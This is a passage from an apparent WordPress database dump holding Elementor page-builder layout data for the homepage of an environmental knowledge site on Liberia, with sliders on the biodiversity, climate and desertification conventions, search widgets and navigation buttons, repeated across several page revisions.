center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\"}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"show_author\":\"\",\"show_comments\":\"\",\"arrows\":\"\",\"autoplay\":\"\",\"infinite\":\"\",\"meta_title_related_position\":\"after\",\"meta_content_related_position\":\"after\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(28261,4075,'_elementor_version','3.4.0'),(28262,4075,'_elementor_template_type','wp-page'),(28263,4075,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(28265,4075,'_elementor_pro_version','3.3.6'),(28267,4076,'_wp_page_template','default'),(28268,4076,'_elementor_edit_mode','builder'),(28269,4076,'_elementor_data','[{\"id\":\"c41f68d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0aa7a91\"}],\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"0b8df2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2ff14bc\",\"elType\":\"widget\",\"settings\":{\"slides\":[{\"heading\":\"Convention on Biological Diversity \",\"description\":\"CBD is dedicated to promoting sustainable development\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"ef41cbd\",\"horizontal_position\":\"center\",\"vertical_position\":\"middle\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\"},{\"heading\":\"Convention on Climate Change\",\"description\":\"The ultimate objective of the Convention is to stabilize greenhouse gas concentrations \\\"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\\\"\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"11d0065\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\"},{\"heading\":\"Convention to Combat Desertification\",\"description\":\"A sole legally binding international agreement linking environment and development to sustainable land management.\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"3d86158\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/slide_ccd.jpg\",\"id\":14,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\"}],\"slides_height\":{\"unit\":\"px\",\"size\":370,\"sizes\":[]},\"content_animation\":\"fadeInLeft\"},\"elements\":[],\"widgetType\":\"slides\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3832980\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":120,\"sizes\":[]},\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8ce7e10\"}],\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"f8bb5a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db42395\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a3ddb70\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"ecc2093\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.2370000000000000994759830064140260219573974609375},\"elements\":[],\"isInner\":true},{\"id\":\"73e3c60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":77.0799999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":true},{\"id\":\"e733e70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":10.3469999999999995310417943983338773250579833984375},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\"}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}],\"reverse_order_tablet\":\"reverse-tablet\",\"reverse_order_mobile\":\"reverse-mobile\",\"hide_mobile\":\"hidden-phone\"},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\"}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"show_author\":\"\",\"show_comments\":\"\",\"arrows\":\"\",\"autoplay\":\"\",\"infinite\":\"\",\"meta_title_related_position\":\"after\",\"meta_content_related_position\":\"after\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(28270,4076,'_elementor_version','3.4.0'),(28271,4076,'_elementor_template_type','wp-page'),(28272,4076,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(28274,4076,'_elementor_pro_version','3.3.6'),(28276,4077,'_wp_page_template','default'),(28277,4077,'_elementor_edit_mode','builder'),(28278,4077,'_elementor_data','[{\"id\":\"c41f68d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0aa7a91\"}],\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"0b8df2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2ff14bc\",\"elType\":\"widget\",\"settings\":{\"slides\":[{\"heading\":\"Convention on Biological Diversity \",\"description\":\"CBD is dedicated to promoting sustainable development\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"ef41cbd\",\"horizontal_position\":\"center\",\"vertical_position\":\"middle\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"link_click\":\"button\"},{\"heading\":\"Convention on Climate Change\",\"description\":\"The ultimate objective of the Convention is to stabilize greenhouse gas concentrations \\\"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\\\"\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"11d0065\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"link_click\":\"button\"},{\"heading\":\"Convention to Combat Desertification\",\"description\":\"A sole legally binding international agreement linking environment and development to sustainable land management.\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"3d86158\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/slide_ccd.jpg\",\"id\":14,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"link_click\":\"button\"}],\"slides_height\":{\"unit\":\"px\",\"size\":370,\"sizes\":[]},\"content_animation\":\"fadeInLeft\"},\"elements\":[],\"widgetType\":\"slides\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3832980\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":120,\"sizes\":[]},\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8ce7e10\"}],\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"f8bb5a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db42395\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a3ddb70\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"ecc2093\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.2370000000000000994759830064140260219573974609375},\"elements\":[],\"isInner\":true},{\"id\":\"73e3c60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":77.0799999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again 